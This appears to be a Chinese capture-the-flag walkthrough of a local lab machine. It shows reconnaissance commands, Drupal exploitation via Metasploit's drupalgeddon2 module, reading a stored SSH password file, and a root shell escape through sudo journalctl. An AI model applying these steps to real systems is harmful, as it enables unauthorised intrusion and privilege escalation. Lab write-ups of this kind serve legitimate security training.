信息收集阶段
1.1 IP收集
使用命令:arp-scan -l
获得IP:192.168.137.178
1.2 端口收集
使用命令获取开放的端口:nmap -T4 -A 192.168.137.178
1.3 CMS识别
使用命令:whatweb -v http://192.168.137.178/
并没有获取什么有用的信息
1.4 目录扫描
dirb http://192.168.137.178
扫描出来了一个home.html
以及about.html
,但是根据这俩页面的内容好像都没啥用啊 … …
漏洞利用阶段
在端口信息收集中,貌似识别出了三个CMS系统。
对这三个CMS系统分别使用对应的工具进行测试:
WordPress 5.7.2:wpscan
Joomla:metasploit
Drupal:metasploit
最终测试测试,在msf
工具中有一个模块可以利用Drupal 7
:
use exploit/unix/webapp/drupal_drupalgeddon2
需要配置这几个参数,随后run运行就行,如果run无法成功获得meterpreter的话重启靶机以及Kali即可。
由于我们是使用的Drupal
模块登录的,所以进入该用户下的目录cd /var/www/html/drupal/misc
。在该目录下存在一个tyrell.pass
文件。
cat得知是一个ssh的用户账密。
利用该用户登录之后,使用命令:sudo -l
查看能以root身份运行的命令。
/bin/journalctl可以进行利用,
sudo journalctl
!/bin/sh